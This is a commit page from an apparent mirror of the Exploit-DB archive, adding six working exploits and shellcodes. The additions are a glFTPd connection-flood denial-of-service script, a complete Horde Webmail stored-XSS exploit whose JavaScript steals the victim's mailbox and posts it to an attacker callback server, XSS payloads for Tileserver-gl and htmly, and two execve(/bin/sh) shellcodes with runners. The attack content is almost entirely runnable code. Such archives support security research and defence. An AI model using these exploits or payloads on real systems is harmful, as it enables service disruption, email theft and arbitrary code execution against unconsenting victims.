bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2021-04-16

Browse source 
6 changes to exploits/shellcodes

glFTPd 2.11a - Remote Denial of Service
Horde Groupware Webmail 5.2.22 - Stored XSS
Tileserver-gl 3.0.0 - 'key' Reflected Cross-Site Scripting (XSS)
htmly 2.8.0 - 'description' Stored Cross-Site Scripting (XSS)

Linux/x86 - execve(/bin/sh) Shellcode (17 bytes)
Linux/x64 - execve(/bin/sh) Shellcode (21 bytes) (2)
This commit is contained in:
Offensive Security 2021-04-16 05:02:00 +00:00
parent bccca11e26
commit 53c15c17c6
8 changed files with 534 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

101
exploits/multiple/dos/49773.py Executable file
View file

@ -0,0 +1,101 @@
# Exploit Title: glFTPd 2.11a - Remote Denial of Service
# Date: 15/05/2021
# Exploit Author: xynmaps
# Vendor Homepage: https://glftpd.io/
# Software Link: https://glftpd.io/files/glftpd-LNX-2.11a_1.1.1k_x64.tgz
# Version: 2.11a
# Tested on: Parrot Security OS 5.9.0
#-------------------------------#
#encoding=utf8
#__author__ = XYN/Dump/NSKB3
#glFTPd Denial of Service exploit by XYN/Dump/NSKB3.
"""
glFTPd only lets a certain amount of connections to be made to the server, so, by repeatedly making new connections to the server,
you can block other legitimite users from making a connection to the server, if the the connections/ip isn't limited.
(if it's limited, just run this script from different proxies using proxychains, and it will work)
"""
import socket
import sys
import threading
import subprocess
import time
banner = """
._________________.
| glFTPd |
| D o S |
|_________________|
|By XYN/DUMP/NSKB3|
|_|_____________|_|
|_|_|_|_____|_|_|_|
|_|_|_|_|_|_|_|_|_|
"""
usage = "{} <TARGET> <PORT(DEFAULT:21> <MAX_CONNS(DEFAULT:50)>".format(sys.argv[0])
def test(t,p):
s = socket.socket()
s.settimeout(10)
try:
s.connect((t, p))
response = s.recv(65535)
s.close()
return 0
except socket.error:
print("Port {} is not open, please specify a port that is open.".format(p))
sys.exit()
def attack(targ, po, id):
try:
subprocess.Popen("ftp {0} {1}".format(targ, po), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
#print("Worker {} running".format(id))
except OSError: pass
def main():
global target, port, start
print banner
try:
target = sys.argv[1]
except:
print usage
sys.exit()
try:
port = int(sys.argv[2])
except:
port = 21
try:
conns = int(sys.argv[3])
except:
conns = 50
print("[!] Testing if {0}:{1} is open".format(target, port))
test(target, port)
print("[+] Port {} open, starting attack...".format(port))
time.sleep(2)
print("[+] Attack started on {0}:{1}!".format(target, port))
def loop(target, port, conns):
global start
threading.Thread(target=timer).start()
while 1:
for i in range(1, conns + 3):
t = threading.Thread(target=attack, args=(target,port,i,))
t.start()
if i > conns + 2:
t.join()
break
loop()
t = threading.Thread(target=loop, args=(target, port, conns,))
t.start()
def timer():
start = time.time()
while 1:
if start < time.time() + float(900): pass
else:
subprocess.Popen("pkill ftp", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
t = threading.Thread(target=loop, args=(target, port,))
t.start()
break
main()

283
exploits/multiple/webapps/49769.py Executable file
View file

@ -0,0 +1,283 @@
# Exploit Title: Horde Groupware Webmail 5.2.22 - Stored XSS
# Author: Alex Birnberg
# Testing and Debugging: Ventsislav Varbanovski @nu11secur1ty
# Date: 04.14.2021
# Vendor: https://www.horde.org/apps/webmail
# Link: https://github.com/horde/webmail/releases
# CVE: CVE-2021-26929
[+] Exploit Source:
https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-26929
[Exploit Program Code]
#!/usr/bin/python3
# Author idea: Alex Birnberg
# debug nu11secur1ty 2021
import io
import os
import ssl
import sys
import json
import base64
import string
import random
import logging
import smtplib
import sqlite3
import hashlib
import zipfile
import argparse
from flask import Flask, request, Response
from urllib.parse import urlparse
class Exploit:
def __init__(self, args):
# Database
if not os.path.exists('database.db'):
with sqlite3.connect("database.db") as conn:
cursor = conn.cursor()
cursor.execute('CREATE TABLE mailbox (hash TEXT NOT NULL UNIQUE, content BLOB NOT NULL);')
conn.commit()
# SMTP URL
o = urlparse(args.smtp)
self.smtp = {
'ssl': o.scheme.lower() == 'smtps',
'host': o.hostname or '127.0.0.1',
'port': o.port or ('465' if o.scheme.lower() == 'smtps' else '25'),
'username': '' or o.username,
'password': '' or o.password
}
try:
if self.smtp['ssl']:
context = ssl.create_default_context()
context.verify_mode = ssl.CERT_OPTIONAL
context.check_hostname = False
self.server = smtplib.SMTP_SSL(self.smtp['host'], self.smtp['port'], context=context)
else:
self.server = smtplib.SMTP(self.smtp['host'], self.smtp['port'])
except Exception as e:
print(e)
print('[-] Error connecting to SMTP server!')
exit()
try:
self.server.login(self.smtp['username'], self.smtp['password'])
except:
pass
# Callback URL
o = urlparse(args.callback)
self.callback = {
'url': '{}://{}'.format(o.scheme, o.netloc),
'path': ''.join(random.choice(string.ascii_letters) for i in range(20))
}
# Listener URL
o = urlparse(args.listener)
self.listener = {
'ssl': o.scheme.lower() == 'https',
'host': o.hostname or '0.0.0.0',
'port': o.port or 80,
'horde': ''.join(random.choice(string.ascii_letters) for i in range(20))
}
# Target email
self.target = args.target
# Subject
self.subject = args.subject or 'Important Message'
# Environment
self.env = {}
self.env['mailbox'] = args.mailbox or 'INBOX'
self.env['callback'] = '{}/{}'.format(self.callback['url'], self.callback['path'])
def trigger(self):
print('[*] Waiting for emails...')
self.bypass_auth()
print('\n[*] Done')
def bypass_auth(self):
def horde():
f = open('horde.js')
content = 'env = {};\n\n{}'.format(json.dumps(self.env), f.read())
f.close()
return content
def callback():
response = Response('')
with sqlite3.connect("database.db") as conn:
try:
if request.files.get('mbox'):
filename = request.files.get('mbox').filename.replace('zip', 'mbox')
content = request.files.get('mbox').stream.read()
zipdata = io.BytesIO()
zipdata.write(content)
content = zipfile.ZipFile(zipdata)
content = content.open(filename).read()
mail_hash = hashlib.sha1(content).digest().hex()
print('[+] Received mailbox ({})'.format(mail_hash))
cursor = conn.cursor()
cursor.execute('INSERT INTO mailbox (hash, content) VALUES (?, ?)', (mail_hash, content))
except:
pass
response.headers['Access-Control-Allow-Origin'] = '*'
return response
payload = 'var s=document.createElement("script");s.type="text/javascript";s.src="{}/{}";document.head.append(s);'.format(self.callback['url'], self.listener['horde'])
payload = '<script>eval(atob("{}"))</script>'.format(base64.b64encode(payload.encode('latin-1')).decode('latin-1'))
content = 'Subject: {}\nFrom: {}\nTo: {}\n'.format(self.subject, self.smtp['username'], self.target)
# The secret services :)
content += 'X\x00\x00\x00{}\x00\x00\x00X'.format(base64.b64encode(payload.encode('latin-1')).decode('latin-1'))
self.server.sendmail(self.smtp['username'], self.target, content)
app = Flask(__name__)
app.add_url_rule('/{}'.format(self.listener['horde']), 'horde', horde)
app.add_url_rule('/{}'.format(self.callback['path']), 'callback', callback, methods=['POST'])
logging.getLogger('werkzeug').setLevel(logging.ERROR)
cli = sys.modules['flask.cli']
cli.show_server_banner = lambda *x: None
try:
if self.listener['ssl']:
app.run(host=self.listener['host'], port=self.listener['port'], ssl_context=('cert.pem', 'key.pem'))
else:
app.run(host=self.listener['host'], port=self.listener['port'])
except:
pass
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--smtp', help='SMTP URL', required=True, metavar='URL')
parser.add_argument('--callback', help='Callback URL', required=True, metavar='URL')
parser.add_argument('--listener', help='Listener URL', metavar='URL')
parser.add_argument('--target', help='Target email', required=True, metavar='EMAIL')
parser.add_argument('--subject', help='Email subject', metavar='SUBJECT')
parser.add_argument('--mailbox', help='Mailbox from which to steal the emails', metavar='INBOX')
args = parser.parse_args()
exploit = Exploit(args)
exploit.trigger()
horde.js
class Exploit {
constructor() {
this.basepath = document.location.pathname.substring(0, document.location.pathname.indexOf('imp'));
}
trigger() {
this.mailbox = this.get_mailbox();
this.buid = this.get_buid();
this.token = this.get_token();
this.auto_delete()
.then(() => {
this.exfiltrate_emails({mailbox: env.mailbox});
});
}
async auto_delete() {
let params = new URLSearchParams()
params.append('token', this.token);
params.append('view', this.mailbox);
params.append('buid', this.buid);
return fetch(this.basepath + 'services/ajax.php/imp/deleteMessages', {
method: 'POST',
body: params
})
.then(() => {
let params = new URLSearchParams();
params.append('token', this.token);
params.append('view', this.mailbox);
return fetch(this.basepath + 'services/ajax.php/imp/purgeDeleted', {
method: 'POST',
body: params
})
.then(() => {
if (document.getElementById('checkmaillink') !== null) {
document.getElementById('checkmaillink').click();
}
});
});
}
async exfiltrate_emails(args) {
let mbox_list = '["' + this.get_mailbox() + '"]';
if (args.mailbox.toUpperCase() != 'INBOX') {
let params = new URLSearchParams();
params.append('reload', '1');
params.append('unsub', '1');
params.append('token', this.token);
let mailboxes = await fetch(this.basepath + 'services/ajax.php/imp/listMailboxes', {
method: 'POST',
body: params
})
.then(response => {
return response.text();
})
.then(data => {
return JSON.parse(data.substring(10, data.length - 2));
});
mailboxes.tasks['imp:mailbox'].a.forEach(mailbox => {
if (mailbox.l.toUpperCase() == args.mailbox) {
if (mbox_list === undefined) {
mbox_list = '["' + mailbox.m + '"]';
}
}
});
}
let zip = await fetch(this.basepath + 'services/download/?app=imp&actionID=download_mbox&mbox_list=' + mbox_list + '&type=mboxzip&token=' + this.token + '&fn=/')
.then(response => {
return [response.blob(), response.headers.get('Content-Disposition')];
});
let filename = zip[1];
filename = filename.substring(filename.indexOf('filename="') + 10, filename.length - 1);
zip = await zip[0];
let formData = new FormData();
formData.append('mbox', zip, filename);
fetch(window.env.callback, {
method: 'POST',
body: formData
});
}
get_token() {
let link;
let token;
if (document.getElementsByClassName('smartmobile-logout').length > 0) {
link = document.getElementsByClassName('smartmobile-logout')[0].href;
}
else if (document.getElementById('horde-logout') !== null) {
link = document.getElementById('horde-logout').getElementsByTagName('a')[0].href;
}
else {
link = location.href;
}
if (link.match('horde_logout_token=(.*)&') !== null) {
token = link.match('horde_logout_token=(.*)&')[1];
}
if (token === undefined && link.match('token=(.*)&') !== null) {
token = link.match('token=(.*)&')[1];
}
return token;
}
get_mailbox() {
if (window.DimpBase !== undefined) {
return DimpBase.viewport.getSelection(DimpBase.pp.VP_view).search({
VP_id: {
equal: [ DimpBase.pp.VP_id ]
}
}).get('dataob').first().VP_view;
}
else if (location.href.match('mailbox=([A-Za-z0-9]*)') !== null) {
return location.href.match('mailbox=([A-Za-z0-9]*)')[1];
}
else if (location.href.match('mbox=([A-Za-z0-9]*)') !== null) {
return location.href.match('mbox=([A-Za-z0-9]*)')[1];
}
}
get_buid() {
if (location.href.match('buid=([0-9]*)') !== null) {
return location.href.match('buid=([0-9]*)')[1];
}
else if (location.href.match(';([0-9]*)') !== null) {
return location.href.match(';([0-9]*)')[1];
}
}
}
const exploit = new Exploit();
exploit.trigger();

10
exploits/multiple/webapps/49771.txt Normal file
View file

@ -0,0 +1,10 @@
# Exploit Title: Tileserver-gl 3.0.0 - 'key' Reflected Cross-Site Scripting (XSS)
# Date: 15/04/2021
# Exploit Author: Akash Chathoth
# Vendor Homepage: http://tileserver.org/
# Software Link: https://github.com/maptiler/tileserver-gl
# Version: versions <3.1.0
# Tested on: 2.6.0
# CVE: 2020-15500
Exploit : http://example.com/?key="><script>alert(document.domain)</script>

58
exploits/multiple/webapps/49772.py Executable file
View file

@ -0,0 +1,58 @@
# Exploit Title: htmly 2.8.0 - 'description' Stored Cross-Site Scripting (XSS)
# Authors: @nu11secur1ty & G.Dzhankushev
# Date: 04.15.2021
# Vendor Homepage: https://www.htmly.com/
# Software Link: https://github.com/danpros/htmly
# CVE: CVE-2021-30637
#!/usr/bin/python3
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
import time
#enter the link to the website you want to automate login.
website_link="http://localhost/htmly/login"
#enter your login username
username="nu11secur1ty"
#enter your login password
password="password"
#enter the element for username input field
element_for_username="user"
#enter the element for password input field
element_for_password="password"
#enter the element for submit button
element_for_submit="submit"
#browser = webdriver.Safari() #for macOS users[for others use chrome vis chromedriver]
browser = webdriver.Chrome() #uncomment this line,for chrome users
#browser = webdriver.Firefox() #uncomment this line,for chrome users
browser.get((website_link))
try:
username_element = browser.find_element_by_name(element_for_username)
username_element.send_keys(username)
password_element = browser.find_element_by_name(element_for_password)
password_element.send_keys(password)
signInButton = browser.find_element_by_name(element_for_submit)
signInButton.click()
# Exploit .ini
browser.get(("http://localhost/htmly/admin/config"))
browser.execute_script("document.querySelector('[name=\"-config-blog.description\"]').innerText = '</span><img src=1 onerror=alert(1) /><span>'")
time.sleep(3)
browser.execute_script("document.querySelector('.btn.btn-primary').click()")
print("payload is deployed...\n")
except Exception:
#### This exception occurs if the element are not found in the webpage.
print("Some error occured :(")

4
files_exploits.csv
View file

@ -6777,6 +6777,7 @@ id,file,description,date,author,type,platform,port
49685,exploits/hardware/dos/49685.txt,"KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Device Reboot (Unauthenticated)",2021-03-19,LiquidWorm,dos,hardware,
49697,exploits/multiple/dos/49697.py,"ProFTPD 1.3.7a - Remote Denial of Service",2021-03-22,xynmaps,dos,multiple,
49730,exploits/hardware/dos/49730.py,"DD-WRT 45723 - UPNP Buffer Overflow (PoC)",2021-03-31,Enesdex,dos,hardware,
49773,exploits/multiple/dos/49773.py,"glFTPd 2.11a - Remote Denial of Service",2021-04-15,xynmaps,dos,multiple,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -43944,3 +43945,6 @@ id,file,description,date,author,type,platform,port
49764,exploits/hardware/webapps/49764.txt,"Genexis PLATINUM 4410 2.1 P4410-V2-1.28 - RCE",2021-04-14,"Jay Sharma",webapps,hardware,
49766,exploits/multiple/webapps/49766.txt,"jQuery 1.2 - Cross-Site Scripting (XSS)",2021-04-14,"Central InfoSec",webapps,multiple,
49767,exploits/multiple/webapps/49767.txt,"jQuery 1.0.3 - Cross-Site Scripting (XSS)",2021-04-14,"Central InfoSec",webapps,multiple,
49769,exploits/multiple/webapps/49769.py,"Horde Groupware Webmail 5.2.22 - Stored XSS",2021-04-15,nu11secur1ty,webapps,multiple,
49771,exploits/multiple/webapps/49771.txt,"Tileserver-gl 3.0.0 - 'key' Reflected Cross-Site Scripting (XSS)",2021-04-15,"Akash Chathoth",webapps,multiple,
49772,exploits/multiple/webapps/49772.py,"htmly 2.8.0 - 'description' Stored Cross-Site Scripting (XSS)",2021-04-15,nu11secur1ty,webapps,multiple,

Can't render this file because it is too large.

2
files_shellcodes.csv
View file

@ -1032,3 +1032,5 @@ id,file,description,date,author,type,platform
49472,shellcodes/linux/49472.c,"Linux/x64 - Bind_tcp (0.0.0.0:4444) + Password (12345678) + Shell (/bin/sh) Shellcode (142 bytes)",2021-01-25,"Guillem Alminyana",shellcode,linux
49547,shellcodes/linux_x86-64/49547.c,"Linux/x64 - execve _cat /etc/shadow_ Shellcode (66 bytes)",2021-02-09,"Felipe Winsnes",shellcode,linux_x86-64
49592,shellcodes/windows_x86/49592.asm,"Windows/x86 - Add User Alfred to Administrators/Remote Desktop Users Group Shellcode (240 bytes)",2021-02-24,"Armando Huesca Prida",shellcode,windows_x86
49768,shellcodes/linux_x86/49768.c,"Linux/x86 - execve(/bin/sh) Shellcode (17 bytes)",2021-04-15,s1ege,shellcode,linux_x86
49770,shellcodes/linux_x86-64/49770.c,"Linux/x64 - execve(/bin/sh) Shellcode (21 bytes) (2)",2021-04-15,s1ege,shellcode,linux_x86-64

1 id file description date author type platform
1032 49472 shellcodes/linux/49472.c Linux/x64 - Bind_tcp (0.0.0.0:4444) + Password (12345678) + Shell (/bin/sh) Shellcode (142 bytes) 2021-01-25 Guillem Alminyana shellcode linux
1033 49547 shellcodes/linux_x86-64/49547.c Linux/x64 - execve _cat /etc/shadow_ Shellcode (66 bytes) 2021-02-09 Felipe Winsnes shellcode linux_x86-64
1034 49592 shellcodes/windows_x86/49592.asm Windows/x86 - Add User Alfred to Administrators/Remote Desktop Users Group Shellcode (240 bytes) 2021-02-24 Armando Huesca Prida shellcode windows_x86
1035 49768 shellcodes/linux_x86/49768.c Linux/x86 - execve(/bin/sh) Shellcode (17 bytes) 2021-04-15 s1ege shellcode linux_x86
1036 49770 shellcodes/linux_x86-64/49770.c Linux/x64 - execve(/bin/sh) Shellcode (21 bytes) (2) 2021-04-15 s1ege shellcode linux_x86-64

46
shellcodes/linux_x86-64/49770.c Normal file
View file

@ -0,0 +1,46 @@
# Linux/x64 - execve(/bin/sh) Shellcode (21 bytes)
# Author: s1ege
# Tested on: x86_64 GNU/Linux
# Shellcode Length: 21
/*
################################################
objdump disassembly
################################################
401000: 50 push %rax
401001: 48 31 d2 xor %rdx,%rdx
401004: 48 bb 2f 62 69 6e 2f movabs $0x68732f2f6e69622f,%rbx
40100b: 2f 73 68
40100e: 53 push %rbx
40100f: 54 push %rsp
401010: 5f pop %rdi
401011: b0 3b mov $0x3b,%al
401013: 0f 05 syscall
################################################
################################################
shellcode.asm
################################################
; nasm -felf64 shellcode.asm && ld shellcode.o -o shellcode
section .text
global _start
_start:
push rax
xor rdx, rdx
mov rbx, 0x68732f2f6e69622f
push rbx
push rsp
pop rdi
mov al, 59
syscall
################################################
*/
unsigned char shellcode[] = \
"\x50\x48\x31\xd2\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05";
int main() {
int (*ret)() = (int(*)())shellcode;
ret();
return 0;
}

30
shellcodes/linux_x86/49768.c Normal file
View file

@ -0,0 +1,30 @@
# Linux/x86 - execve(/bin/sh) Shellcode (17 bytes)
# Author: s1ege
# Tested on: i686 GNU/Linux
# Shellcode length: 17
/*
; nasm -felf32 shellcode.asm && ld -melf_i386 shellcode.o -o shellcode
section .text
global _start
_start:
push 0x0b
pop eax
push 0x0068732f
push 0x6e69622f
mov ebx, esp
int 0x80
*/
#include <stdio.h>
#include <string.h>
unsigned char code[] = \
"\x6a\x0b\x58\x68\x2f\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80";
int main() {
printf("Shellcode Length: %lu\n", sizeof(code)-1); // subtract null byte
int (*ret)() = (int(*)())code;
ret();
return 0;
}